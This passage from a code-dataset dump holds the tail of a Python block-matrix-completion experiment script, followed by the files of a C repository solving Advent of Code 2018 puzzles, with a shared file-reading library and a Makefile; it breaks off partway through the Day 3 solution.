#('cuda')\nnoise = 0.1\n#r = 10\n\n# experiments over various random matrices to be completed\nfor o in range(1):\n\n # block matrix to be completed, symmetric psd of rank r\n np.random.seed(o)\n \n A = build_random_A(r,q,p,device = device)\n XX = []\n for i in range(p):\n for j in range(p):\n mm = np.zeros((p,p))\n mm[i,j] = 1.\n XX.append(mm)\n XX = np.array(XX)\n XXX = torch.tensor(XX, device=device).float()\n YYY = build_Y(len(XXX),XXX,A,noise = noise,device = device)\n YYY = YYY.numpy()\n\n M = np.zeros((p*q, p*q))\n i = 0\n for p1 in range(p):\n for p2 in range(p):\n M[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = YYY[i]\n i+=1\n\n if np.min(M) < 0: M += -2* np.min(M)\n np.save('data/completion/M_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'.npy', M)\n \n Y = M\n Ycorrect = M # for compatibility\n\n n_tot = p**2\n # n = 25\n t = n_tot - n\n print(\"ntot, n, t, p, q\", n_tot, n, t, p, q)\n\n # put to right format\n X_all = torch.zeros((n_tot, p, p), device='cpu')\n Y_all = torch.zeros((n_tot, q, q), device='cpu')\n Y_all_correct = torch.zeros((n_tot, q, q), device='cpu')\n for p1 in range(p):\n for p2 in range(p):\n Y_all[p1*p+p2, :, :] = torch.from_numpy(Y[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n Y_all_correct[p1*p+p2, :, :] = torch.from_numpy(Ycorrect[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n tmp = np.zeros((p, p))\n tmp[p1, p2] = 1\n X_all[p1*p+p2, :, :] = torch.from_numpy(tmp)\n\n\n def get_mat_from_torch_array(ta, p, q):\n mat = np.zeros((p*q, p*q))\n # print(ta.shape, p, q)\n for p1 in range(p):\n for p2 in range(p):\n # print(ta[p1*p+p2, :, :].shape)\n # print(mat[p1*q:(p1+1)*q, p2*q:(p2+1)*q].shape)\n mat[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = ta[p1*p+p2, :, :] # todo rows and cols the other way around?\n return mat\n\n N = 6 # number of elements in lambda vector\n rank = m # reduced rank regression\n\n lambda_vec = np.logspace(-3, 2, N) # all right, I guess?\n print(lambda_vec)\n print()\n\n device = 'cpu'\n nb_iter = 5\n for ii in range(nb_iter):\n \n\n # # ----- just random -----\n np.random.seed(ii) # always leave the random seed undommented for reproducible results!\n \n # any blocs can be removed, preserve symetry\n if m == 0:\n ordertmp = np.random.permutation(n_tot)\n # check for symetry!\n order = ordertmp[:int(n/2)].tolist()\n order2 = list(order)\n for o in order:\n ix = int(o / p)\n jx = int(o % p)\n order2.append(jx*p+ix)\n order2 = list(set(order2))\n if len(order2) < n:\n print(\"missing!\")\n nn = len(order2)\n diag = np.arange(0, p)*(p+1)\n np.random.shuffle(diag)\n for _ in range(n-nn):\n iii = 0\n cont = True\n while iii < 
len(diag) and cont:\n if diag[iii] not in order2: \n order2.append(diag[iii])\n cont = False\n iii = iii + 1\n order = np.array(order2)\n all = np.arange(0, p*p)\n others = np.array(list(set(all)-set(order)))\n order = np.append(order, others)\n\n # # ----- keep only diagonal blocs -----\n if m == 1:\n order = np.arange(0, p)*(p+1)\n n = len(order)\n all = np.arange(0, p*p)\n nondiag = np.array(list(set(all)-set(order)))\n order = np.append(order, nondiag)\n\n # ----- keep off-diagonal blocs -----\n if m == 2:\n order = np.arange(0, p)*(p+1)\n all = np.arange(0, p*p)\n trainingsamples = np.array(list(set(all)-set(order)))\n # order contains nondiag.. add missing elements here!\n while len(trainingsamples) > n:\n elem = np.random.choice(trainingsamples)\n [elemrow, elemcol] = np.unravel_index(elem, (p, p))\n elem2 = np.ravel_multi_index((elemcol, elemrow), (p, p))\n order = np.append(order, [elem, elem2])\n trainingsamples = np.array(list(set(all)-set(order)))\n order = np.append(trainingsamples, order)\n \n nm = n\n if m < 3:\n X_ = X_all[order[:nm], :, :]\n Xt_ = X_all[order[nm:], :, :]\n Y_ = Y_all[order[:nm], :, :]\n Yt_ = Y_all[order[nm:], :, :]\n\n # ------- create random missing entries not in blocs, but symmetric ---\n if m == 3:\n coord = []\n for i in range(p*q):\n for j in range(p*q):\n if j <= i: coord.append((i,j))\n np.random.shuffle(coord)\n coord = coord[:int(n/2)]\n coord2 = list(coord)\n for o in coord:\n ix = o[0]\n jx = o[1]\n coord2.append((jx,ix))\n coord2 = list(set(coord2))\n mask = np.zeros((p*q, p*q))\n for cc in coord2:\n mask[cc[0], cc[1]] = 1.\n\n # create training set, keep only blocs with enough data, currently at least 1. # 25%\n M_atrou = M * mask\n Y_all = torch.zeros((n_tot, q, q), device='cpu')\n trainset = []\n for p1 in range(p):\n for p2 in range(p):\n if np.sum(mask[p1*q:(p1+1)*q, p2*q:(p2+1)*q]) > 0: # it's a bloc with enough entries to put in training set\n trainset.append(p1*p+p2)\n Y_all[p1*p+p2, :, :] = torch.from_numpy(M_atrou[p1*q:(p1+1)*q, p2*q:(p2+1)*q])\n order = np.arange(0, p*p)\n \n\n nm = len(order)\n X_ = X_all[trainset, :, :]\n Xt_ = X_all[order[:nm], :, :]\n Y_ = Y_all[trainset, :, :]\n Yt_ = Y_all[order[:nm], :, :]\n\n\n \n X = X_.numpy()\n Xt = Xt_.numpy()\n Y = Y_.numpy()\n Yt = Yt_.numpy()\n\n print(X.shape, Xt.shape)\n np.save('data/completion/X_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', X_.numpy())\n np.save('data/completion/Xt_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Xt_.numpy())\n np.save('data/completion/Y_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Y_.numpy())\n np.save('data/completion/Yt_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', Yt_.numpy())\n\n ## reconstruct complete M matrix\n mat = np.array(M)\n\n if m == 3: \n mat_atrou = M_atrou\n else:\n mat_atrou = np.array(M)\n for j in range(Xt.shape[0]):\n c = np.where(Xt[j] == 1.)\n p1, p2 = int(c[0]), int(c[1])\n mat_atrou[p1*q:(p1+1)*q, p2*q:(p2+1)*q] = np.zeros(Yt[0].shape)\n\n cmap = plt.cm.pink\n vmin = float(np.min(mat))\n vmax = float(np.max(mat))\n\n plt.figure()\n plt.matshow(mat, fignum=False, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.savefig('data/completion/M_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.png')\n \n plt.figure()\n plt.matshow(mat_atrou, fignum=False, vmin=vmin, vmax=vmax, cmap=cmap)\n plt.savefig('data/completion/M_atrou_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.png')\n \n 
np.save('data/completion/M_atrou_'+str(n)+'_'+str(p)+'_'+str(q)+'_'+str(r)+'_'+str(m)+'_'+str(ii)+'.npy', mat_atrou)\n\n" } ]
8
pwmoore/AdventOfCode2018
https://github.com/pwmoore/AdventOfCode2018
a2c94dd802e8f7f3d0fc8d674f502322a00bbdfb
2841b7186d5035d1abb97c2ccd1508b561128895
136bbc816ffda2fc2b0569ff4185ce350133590d
refs/heads/master
2020-04-10T08:48:12.704227
2018-12-17T04:48:52
2018-12-17T04:48:52
160,915,335
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5030978918075562, "alphanum_fraction": 0.5111523866653442, "avg_line_length": 23.830768585205078, "blob_id": "5790292cc53a2308323c37578bfe300a2e84e10a", "content_id": "d30fc649a9322af63070df777d76746525738799", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1614, "license_type": "permissive", "max_line_length": 86, "num_lines": 65, "path": "/Day1/Day1.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <errno.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <glib-2.0/gmodule.h>\n#include <bsd/stdlib.h>\n\nint main(int argc, char *argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input file]\\n\", getprogname());\n exit(EXIT_FAILURE);\n }\n\n char *filename = argv[1];\n FILE *fp = fopen(filename, \"r\");\n if (NULL == fp) {\n printf(\"Could not open %s: %s\\n\", filename, strerror(errno));\n exit(EXIT_FAILURE);\n }\n\n char *line = NULL;\n size_t len = 0;\n ssize_t read = 0;\n\n int linecount = 0;\n \n while ((read = getline(&line, &len, fp)) != -1) {\n linecount++;\n }\n\n rewind(fp);\n\n GHashTable *ht = g_hash_table_new_full(g_direct_hash, g_direct_equal, NULL, NULL);\n int *vals = calloc(linecount, sizeof(int));\n \n int sum = 0;\n int i = 0;\n while ((read = getline(&line, &len, fp)) != -1) {\n int val = strtol(line, NULL, 0);\n sum += val;\n vals[i++] = val;\n if (g_hash_table_contains(ht, GINT_TO_POINTER(sum))) {\n printf(\"Found it: %d\\n\", sum);\n return EXIT_SUCCESS;\n }\n g_hash_table_add(ht, GINT_TO_POINTER(sum));\n }\n\n bool found = false;\n while (!found) {\n for (i = 0; i < linecount; ++i) {\n sum += vals[i];\n if (g_hash_table_contains(ht, GINT_TO_POINTER(sum))) {\n printf(\"Found it: %d\\n\", sum);\n return EXIT_SUCCESS;\n }\n g_hash_table_add(ht, GINT_TO_POINTER(sum));\n } \n }\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.43459752202033997, "alphanum_fraction": 0.4632352888584137, "avg_line_length": 23.60952377319336, "blob_id": "38f3e943289b201ba3692f6190e31eda00c94515", "content_id": "18dcec19e0c98026253f658beef3e49517578049", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2584, "license_type": "permissive", "max_line_length": 74, "num_lines": 105, "path": "/Day2/Day2.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\nvoid count_letters(line_t *line, bool *counts2, bool *counts3)\n{\n unsigned long num2s = 0, num3s=0;\n unsigned long char_counts[26] = {0};\n for (size_t i = 0; i < line->len; ++i) {\n int index = line->str[i] - 'a';\n unsigned long oldcnt = char_counts[index];\n unsigned long newcnt = char_counts[index] + 1;\n if (oldcnt == 2 && newcnt > 2) {\n num2s--;\n } else if (oldcnt == 3 && newcnt > 3) {\n num3s--;\n } \n \n if (newcnt == 2) {\n num2s++;\n } else if (newcnt == 3) {\n num3s++;\n }\n\n char_counts[index] = newcnt;\n }\n\n if (num2s > 0) {\n *counts2 = true;\n }\n\n if (num3s > 0) {\n *counts3 = true;\n }\n}\n\nint hamming_distance(line_t *l1, line_t *l2, char *outstr)\n{\n int hd = 0;\n int out_index = 0;\n for (size_t i = 0; i < l1->len; ++i) {\n if (l1->str[i] != l2->str[i]) {\n hd++;\n } else {\n outstr[out_index++] = l1->str[i];\n }\n }\n\n return hd;\n}\n\nint main(int argc, char 
*argv[])\n{\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_get_lines(argv[1], NULL, NULL, NULL);\n DIE_IF((file == NULL), \"Could not read lines from %s\\n\", argv[1]);\n\n uint64_t num2s = 0, num3s = 0;\n line_t *line = NULL;\n for (uint32_t i = 0; i < file_line_count(file); ++i) {\n line = file_get_line(file, i);\n bool count2 = false, count3 = false;\n count_letters(line, &count2, &count3);\n if (count2) {\n num2s++;\n }\n\n if (count3) {\n num3s++;\n }\n }\n\n printf(\"result: (%lu * %lu) = %lu\\n\", num2s, num3s, (num2s * num3s));\n\n size_t line_size = line_length(file_get_line(file, 0));\n char outstr[line_size];\n for (uint32_t i = 0; i < file_line_count(file); ++i) {\n line_t *l1 = file_get_line(file, i);\n for (uint32_t j = 0; j < file_line_count(file); ++j) {\n if (j != i) {\n line_t *l2 = file_get_line(file, j);\n memset(outstr, 0, line_size);\n int hd = hamming_distance(l1, l2, outstr);\n if (hd == 1) {\n printf(\"%s\\n\", outstr);\n goto out;\n return 0;\n }\n }\n }\n }\n\nout:\n file_free(file);\n}\n" }, { "alpha_fraction": 0.5368726253509521, "alphanum_fraction": 0.5479685664176941, "avg_line_length": 25.871559143066406, "blob_id": "5aa2945006cb5b2984e8f287b11ed9513b703c05", "content_id": "50ba3efa717d457dfbe8f6219bdd9f32a9c29c46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5858, "license_type": "permissive", "max_line_length": 173, "num_lines": 218, "path": "/Day5/Day5.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <time.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <pthread.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\n#define TRIGGER ((int)0x20)\n\n#define SHOULD_REACT(__a, __b) (abs(((int)__a) - ((int)__b)) == TRIGGER)\n#define DESTROY(__buf, __a, __b, __cnt) do { __buf[__a] = '\\0'; __buf[__b] = '\\0'; if (__a == 0) { __a += 2; __b += 2; } else { __a -= 1; __b += 1; } __cnt -= 2; } while (0)\n\ntypedef struct polymer {\n char *units;\n size_t total_size;\n size_t current_size;\n size_t start;\n size_t current;\n size_t next;\n} polymer_t;\n\npolymer_t *polymer_create(char *buf, size_t size)\n{\n polymer_t *polymer = calloc(1, sizeof(polymer_t));\n polymer->units = calloc(1, size);\n memcpy(polymer->units, buf, size);\n \n if (polymer->units[size - 1] == '\\n') {\n polymer->units[size - 1] = '\\0';\n size -= 1;\n }\n polymer->current_size = polymer->total_size = size;\n polymer->current = 0;\n polymer->start = 0;\n polymer->next = 1;\n return polymer;\n}\n\nvoid polymer_free(polymer_t *polymer)\n{\n if (polymer) {\n free(polymer->units);\n free(polymer);\n }\n}\n\nvoid polymer_print(polymer_t *polymer)\n{\n char buf[polymer->current_size + 1];\n memset(buf, 0, polymer->current_size + 1);\n for (size_t i = 0, j = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] != '\\0') {\n buf[j++] = polymer->units[i];\n }\n }\n printf(\"%s (C: %zu, N: %zu, Current: %zu, Total: %zu\\n\", buf, polymer->current, polymer->next, polymer->current_size, polymer->total_size);\n}\n\nstatic inline bool polymer_test(polymer_t *polymer)\n{\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n if (SHOULD_REACT(a, b)) {\n return true;\n } else {\n return false;\n }\n}\n\nstatic inline bool polymer_done_processing(polymer_t *polymer)\n{\n return (polymer->next == 
(polymer->total_size - 1));\n}\n\n#define likely(x) __builtin_expect((x),1)\n#define unlikely(x) __builtin_expect((x),0)\n\nstatic inline void polymer_update(polymer_t *polymer)\n{\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n\n // Case 1: We just destroyed a pair.\n if (a == '\\0' && b == '\\0') {\n // Special case: we destroy the first two units\n if (unlikely(polymer->current == polymer->start)) {\n // Skip over the destroyed units and set start to current\n polymer->current += 2;\n polymer->next += 2;\n polymer->start = polymer->current;\n } else {\n while (polymer->units[polymer->current] == '\\0') {\n polymer->current -= 1;\n }\n polymer->next += 1;\n }\n\n // Update size\n polymer->current_size -= 2;\n } else {\n // Case 2: We didn't destroy anything. Set current equal to next\n // and next is incremented by one\n polymer->current = polymer->next;\n polymer->next += 1;\n }\n}\n\nstatic inline void polymer_remove(polymer_t *polymer, char c)\n{\n for (size_t i = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] == c || polymer->units[i] == (c + TRIGGER)) {\n polymer->units[i] = '\\0';\n polymer->current_size -= 1;\n }\n }\n char *newbuf = calloc(1, polymer->current_size + 1);\n memset(newbuf, 0, polymer->current_size + 1);\n for (size_t i = 0, j = 0; i < polymer->total_size; ++i) {\n if (polymer->units[i] != '\\0') {\n newbuf[j++] = polymer->units[i];\n }\n }\n polymer->total_size = polymer->current_size;\n free(polymer->units);\n polymer->units = newbuf;\n //polymer_print(polymer);\n}\n\nstruct args {\n char c;\n char *buf;\n size_t size;\n};\n\nvoid polymer_destroy(polymer_t *polymer)\n{\n#if 0\n char a = polymer->units[polymer->current];\n char b = polymer->units[polymer->next];\n printf(\"Destroyed %c%c\\n\", a, b);\n#endif\n polymer->units[polymer->current] = '\\0';\n polymer->units[polymer->next] = '\\0';\n}\n\nvoid *find_size_thread(void *args)\n{\n struct args *a = args;\n polymer_t *p = polymer_create(a->buf, a->size);\n polymer_remove(p, a->c);\n while (!polymer_done_processing(p)) {\n if (polymer_test(p)) {\n polymer_destroy(p);\n }\n polymer_update(p);\n }\n \n return (void *)p->current_size;\n}\n\nint main(int argc, char *argv[])\n{\n size_t polymer_length = 0;\n polymer_t *polymer = NULL;\n if (argc < 2) {\n printf(\"usage: %s [input]\\n\", getprogname());\n return EXIT_FAILURE;\n }\n\n file_t *file = file_open(argv[1]);\n DIE_IF((file == NULL), \"Could not read input %s\\n\", argv[1]);\n\n polymer_length = file_size(file);\n char *buf = file_contents(file);\n polymer = polymer_create(buf, polymer_length);\n\n while (!polymer_done_processing(polymer)) {\n if (polymer_test(polymer)) {\n polymer_destroy(polymer);\n }\n polymer_update(polymer);\n //polymer_print(polymer);\n }\n\n printf(\"The answer is %zu\\n\", polymer->current_size);\n size_t best_size = polymer->current_size;\n polymer_free(polymer);\n\n#if 1\n pthread_t threads[26];\n struct args *args = calloc(26, sizeof(struct args));\n for (char c = 'A'; c <= 'Z'; ++c) {\n int i = c - 'A';\n args[i].c = c;\n args[i].buf = buf;\n args[i].size = polymer_length;\n pthread_create(&threads[i], NULL, find_size_thread, &args[i]);\n }\n for (char c = 'A'; c <= 'Z'; ++c) {\n int i = c - 'A';\n size_t ret = 0;\n pthread_join(threads[i], (void **)&ret);\n if (ret < best_size) {\n best_size = ret;\n }\n }\n\n printf(\"The new best size is %zu\\n\", best_size);\n#endif\n file_free(file);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5644444227218628, "alphanum_fraction": 
0.6177777647972107, "avg_line_length": 19.454545974731445, "blob_id": "fd41e5cfb6f02a6513a08c2d16ced58ce79cb70f", "content_id": "a79e66049f326ffe286565f4a80ad86d716d2943", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 225, "license_type": "permissive", "max_line_length": 89, "num_lines": 11, "path": "/Day3/Makefile", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "BIN=Day3\nGLIBFLAGS=-I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -lglib-2.0\nLIB=../lib/file.c\nLIBINC=-I ../lib\n\n$(BIN): $(LIB) $(BIN).c\n\tcc -O3 $^ $(LIBINC) -lbsd -o $@\n\n.PHONY: clean\nclean:\n\trm $(BIN)\n" }, { "alpha_fraction": 0.5116156339645386, "alphanum_fraction": 0.5192713737487793, "avg_line_length": 20.280899047851562, "blob_id": "37741d2f11051a4fa77f85582be1fc029d82a1f2", "content_id": "64ff22e74a46b2be4560a57c26115d06f8cc699a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3788, "license_type": "permissive", "max_line_length": 140, "num_lines": 178, "path": "/lib/file.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <sys/stat.h>\n#include <sys/mman.h>\n\n#include \"utils.h\"\n#include \"file.h\"\n\nint line_cmp(const void *a, const void *b) \n{\n line_t *l1 = *(line_t **)a;\n line_t *l2 = *(line_t **)b;\n return strcmp(l1->str, l2->str);\n}\n\nvoid file_sort_lines(file_t *file)\n{\n qsort(file->lines, file->nlines, sizeof(file->lines[0]), file->sort_callback);\n}\n\nline_t *file_next_line(FILE *fp) {\n ssize_t bytes_read = 0;\n char *str = NULL;\n size_t len = 0;\n bytes_read = getline(&str, &len, fp);\n if (bytes_read < 0) {\n return NULL;\n }\n\n len = strlen(str);\n if (str[len - 1] == '\\n') {\n str[len - 1] = '\\0';\n len -= 1;\n }\n\n line_t *line = calloc(1, sizeof(*line));\n line->str = str;\n line->len = len;\n return line;\n}\n\nvoid file_line_free(line_t *line)\n{\n if (line) {\n free(line->str);\n free(line);\n }\n}\n\nfile_t *file_get_lines(const char *filename, line_transform_t transform_callback, line_data_free_t free_callback, line_sort_t sort_callback)\n{\n FILE *fp = fopen(filename, \"r\");\n VALIDATE_PTR_OR_RETURN(fp, NULL);\n\n file_t *file= calloc(1, sizeof(*file));\n VALIDATE_PTR_OR_RETURN(file, NULL);\n file->capacity = FILE_LINES_INITIAL_CAPACITY;\n file->lines = calloc(file->capacity, sizeof(line_t *));\n\n line_t *line = NULL;\n while ((line = file_next_line(fp)) != NULL) {\n if (file->nlines == (file->capacity)) {\n size_t new_capacity = 2 * file->capacity;\n file->lines = realloc(file->lines, (new_capacity * sizeof(line_t *)));\n file->capacity = new_capacity;\n }\n \n if (transform_callback) {\n transform_callback(line);\n }\n\n file->lines[file->nlines++] = line;\n }\n\n if (free_callback) {\n file->free_callback = free_callback;\n }\n\n if (sort_callback) {\n file->sort_callback = sort_callback;\n } else {\n file->sort_callback = line_cmp;\n }\n\n fclose(fp);\n return file;\n}\n\nvoid file_free(file_t *file)\n{\n if (file) {\n for (size_t i = 0; i < file->nlines; ++i) {\n line_t *line = file_get_line(file, i);\n if (line) {\n if (file->free_callback) {\n file->free_callback(line);\n }\n file_line_free(line);\n }\n }\n if (file->contents) {\n free(file->contents);\n }\n free(file->lines);\n free(file);\n }\n}\n\nline_t *file_get_line(file_t *file, uint32_t 
lineno)\n{\n if (lineno >= file->nlines) {\n return NULL;\n } else {\n return file->lines[lineno];\n }\n}\n\nlong *file_lines_get_as_numbers(file_t *file)\n{\n long *vals = calloc(file->nlines, sizeof(long));\n for (size_t i = 0; i < file->nlines; ++i) {\n vals[i] = strtol(file->lines[i]->str, NULL, 0);\n }\n return vals;\n}\n\nint file_get_size(const char *filename, size_t *size)\n{\n struct stat sb;\n if (stat(filename, &sb)) {\n return -1;\n }\n\n *size = sb.st_size;\n return 0;\n}\n\nfile_t *file_open(const char *filename)\n{\n file_t *file = calloc(1, sizeof(file_t));\n FILE *fp = NULL;\n int err = file_get_size(filename, &file->size);\n if (err) {\n goto out;\n }\n\n fp = fopen(filename, \"r\");\n if (fp == NULL) {\n err = -1;\n goto out;\n }\n\n file->contents = calloc(1, file->size);\n\n if (file->contents == NULL) {\n err = -1;\n goto out;\n }\n\n if (fread(file->contents, 1, file->size, fp) != file->size) {\n err = -1;\n goto out;\n }\n\n err = 0;\n\nout:\n if (err) {\n file_free(file);\n file = NULL;\n }\n fclose(fp);\n\n return file;\n}\n" }, { "alpha_fraction": 0.6467203497886658, "alphanum_fraction": 0.6507480144500732, "avg_line_length": 19.20930290222168, "blob_id": "67f9e2b96188185bae808a5fe55cee2e45927ed0", "content_id": "cfe1da9df1ea1243e1097996b15f5b130d51ffe6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1738, "license_type": "permissive", "max_line_length": 150, "num_lines": 86, "path": "/lib/file.h", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#ifndef FILE_H\n#define FILE_H\n\n#include <stdint.h>\n#include <unistd.h>\n#include <stdbool.h>\n\ntypedef struct line\n{\n char *str;\n size_t len;\n void *extra;\n} line_t;\n\ntypedef bool (*line_transform_t)(line_t *line);\ntypedef void (*line_data_free_t)(line_t *line);\ntypedef int (*line_sort_t)(const void *a, const void *b);\n\ntypedef struct file\n{\n char *contents;\n size_t size;\n size_t nlines;\n size_t capacity;\n line_t **lines;\n line_sort_t sort_callback;\n line_data_free_t free_callback;\n} file_t;\n\n\n#define FILE_LINES_INITIAL_CAPACITY (1000)\n\n#define file_for_each_line(__f, __l, __i) \\\n for (__i = 0, __l = (line_t *)(((file_t *)__f)->lines[__i]); __i < file_line_count(__f); ++(__i), __l = (line_t *)(((file_t *)__f)->lines[__i])) \\\n\n#ifdef __cplusplus\nextern \"C\" { \n#endif\n\nstatic inline char *line_string(line_t *line)\n{\n return line->str;\n}\n\nstatic inline size_t line_length(line_t *line)\n{\n return line->len;\n}\n\nstatic inline void *line_extra_data(line_t *line)\n{\n return line->extra;\n}\n\nstatic inline size_t file_line_count(file_t *file)\n{\n return file->nlines;\n}\n\nstatic inline size_t file_total_capacity(file_t *file)\n{\n return file->capacity;\n}\n\nstatic inline size_t file_size(file_t *file)\n{\n return file->size;\n}\n\nstatic inline char *file_contents(file_t *file)\n{\n return file->contents;\n}\n\nvoid file_sort_lines(file_t *lines);\nfile_t *file_get_lines(const char *filename, line_transform_t transform_callback, line_data_free_t free_callback, line_sort_t sort_callback);\nline_t *file_get_line(file_t *file, uint32_t lineno);\nlong *file_get_as_numbers(file_t *lines);\nvoid file_free(file_t *file);\nfile_t *file_open(const char *filename);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n" }, { "alpha_fraction": 0.5322580933570862, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 40.33333206176758, "blob_id": "9352d4f6e525e618a7f08a851264100bb283c1df", "content_id": 
"7c2bd045a0819b4a32832e64abe362e9c804f5a2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 372, "license_type": "permissive", "max_line_length": 122, "num_lines": 9, "path": "/lib/utils.h", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#ifndef UTILS_H\n#define UTILS_H\n\n#define DIE_IF(__cond, __msg, ...) if (__cond) { fprintf(stderr, \"[X] \" __msg \"\\n\", ## __VA_ARGS__); exit(EXIT_FAILURE); }\n#define ERR(__msg, ...) do { fprintf(stderr, \"[X] \" __msg \"\\n\", ## __VA_ARGS__); } while (0)\n\n#define VALIDATE_PTR_OR_RETURN(__ptr, __retval) if (0 == (__ptr)) { ERR(# __ptr \"is NULL!\"); return (__retval); }\n\n#endif\n" }, { "alpha_fraction": 0.7445651888847351, "alphanum_fraction": 0.7880434989929199, "avg_line_length": 60, "blob_id": "319fa60448428a18c847c8a9a4ab05b5701c3b87", "content_id": "838752ba1c4824733cb1f8616e9eaa5236b24cd1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 184, "license_type": "permissive", "max_line_length": 162, "num_lines": 3, "path": "/README.md", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "# AdventOfCode2018\n\nMy solutions to the 2018 Advent of Code, in C. I'm sure there are memory corruption bugs galore because I do minimal sanity checking and this is just for funsies. \n" }, { "alpha_fraction": 0.6092436909675598, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 46.599998474121094, "blob_id": "97d734d69aa22a72a54ef4b2f6d625751fbef3c3", "content_id": "bc73765c38270492533fa1a19659d6c6a7e12612", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "permissive", "max_line_length": 115, "num_lines": 5, "path": "/.ycm_project_conf.py", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "import os\n\ndef get_project_conf(flags, log):\n\tlib_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'lib')\n\treturn flags + ['-I', lib_path, '-I', '/usr/include/glib-2.0', '-I', '/usr/lib/x86_64-linux-gnu/glib-2.0/include']\n" }, { "alpha_fraction": 0.5113791823387146, "alphanum_fraction": 0.5279927253723145, "avg_line_length": 24.39884376525879, "blob_id": "58a68b31b8c3bb28b5da6cf9c55d696f743bc006", "content_id": "aac9faf5f6b3539038f7344fc2633643f6026829", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4394, "license_type": "permissive", "max_line_length": 96, "num_lines": 173, "path": "/Day3/Day3.c", "repo_name": "pwmoore/AdventOfCode2018", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <string.h>\n#include <stdbool.h>\n#include <bsd/stdlib.h>\n\n#include \"file.h\"\n#include \"utils.h\"\n\ntypedef struct claim\n{\n uint32_t id;\n int from_left;\n int from_top;\n int width;\n int height;\n} claim_t;\n\nbool parse_claim(line_t *line)\n{\n char *s = line_string(line);\n claim_t *c = calloc(1, sizeof(claim_t));\n sscanf(s, \"#%u @ %u,%u: %ux%u\", &c->id, &c->from_left, &c->from_top, &c->width, &c->height);\n line->extra = c;\n return true;\n}\n\nvoid free_claim(line_t *line)\n{\n free(line->extra);\n}\n\ntypedef struct fabric\n{\n uint32_t width;\n uint32_t height;\n uint32_t **matrix;\n} fabric_t;\n\n#define FABRIC_SIDE_MIN (1000)\n#define MAX(__a, __b) (((__a) > (__b)) ? (__a) : (__b)) \n#define MIN(__a, __b) (((__a) < (__b)) ? 
